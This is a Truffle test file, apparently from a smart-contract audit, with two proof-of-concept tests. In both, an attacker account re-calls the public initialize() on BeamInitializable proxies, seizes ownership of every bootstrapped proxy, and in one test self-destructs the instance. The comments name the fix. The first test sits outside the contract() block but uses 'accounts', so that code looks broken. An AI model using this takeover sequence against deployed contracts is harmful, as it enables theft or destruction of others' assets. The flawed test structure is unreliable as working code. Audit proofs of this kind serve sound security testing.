Bootstrap process can be hijacked
// Truffle artifact handles for the contracts exercised by the audit tests.
// Same four artifacts, loaded in the same order as individual require() calls would.
const [ForwardProxy, BeamInitializable, BeamBootstrap, Malicious] = [
  'ForwardProxy',
  'BeamInitializable',
  'BeamBootstrap',
  'Malicious',
].map((name) => artifacts.require(name));
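it("BeamInit proxy hijacking ", async () => {
  // Audit proof-of-concept: the logic contract behind ForwardProxy exposes a
  // public initialize(), so ownership of the proxied instance can be reset by
  // any caller after deployment. The fix on the contract side is to make
  // initialize() one-shot (initializer guard) and/or owner-restricted.
  const owner = accounts[0];
  const attacker = accounts[1];
  // The logic contract the proxy forwards to.
  const beamInit = await BeamInitializable.new(owner);
  // The proxy contract.
  const proxyInit = await ForwardProxy.new(beamInit.address);
  // The BeamInitializable interface bound to the proxy's address.
  const placeHolder = await BeamInitializable.at(proxyInit.address);
  // A malicious contract is created for the attacker.
  const malicious = await Malicious.new(attacker);
  // Re-calling the public initialize() through the proxy sets the attacker as owner.
  await placeHolder.initialize(malicious.address, { from: attacker });
  // The proxied instance is now controlled by the attacker.
  assert.equal(await placeHolder.owner(), attacker);
  // Self-destruction by the attacker. Awaited so a revert here fails the test
  // instead of surfacing as an unhandled rejection after the test has passed.
  await placeHolder.cleanup({ from: attacker });
});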
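contract('Audit Testing', (accounts) => {
  it("Bootstrap hijacking", async () => {
    // Audit proof-of-concept: every proxy deployed by BeamBootstrap forwards to a
    // BeamInitializable logic contract whose initialize() is public, so each one
    // can be re-initialized by an arbitrary caller after bootstrap. The fix on
    // the contract side is an initializer guard and/or owner restriction.
    const owner = accounts[0];
    const attacker = accounts[1];
    // Number of proxies BeamBootstrap deploys (20 in the deployed setup).
    const PROXY_COUNT = 20;
    // The bootstrap contract; it deploys PROXY_COUNT proxy contracts using a
    // BeamInitializable contract as the logic contract.
    const bootstrap = await BeamBootstrap.new(owner, { from: owner });
    // Bind the BeamInitializable interface to the i-th bootstrapped proxy.
    const proxyAt = async (i) => BeamInitializable.at(await bootstrap.deployed(i));
    // Ownership of the first proxy is as expected right after bootstrap.
    const first = await proxyAt(0);
    assert.equal(await first.owner(), owner);
    // A malicious contract is created by the attacker.
    const malicious = await Malicious.new(attacker, { from: attacker });
    // Every proxy can be re-initialized by the attacker. Each initialize() call
    // is awaited so the ownership check runs against mined state rather than
    // racing the transaction (the original fired them without awaiting, which
    // could make the assert pass or fail for reasons unrelated to the finding).
    for (let i = 0; i < PROXY_COUNT; i++) {
      const placeHolder = i === 0 ? first : await proxyAt(i);
      await placeHolder.initialize(malicious.address, { from: attacker });
      assert.equal(await placeHolder.owner(), attacker);
    }
  });
});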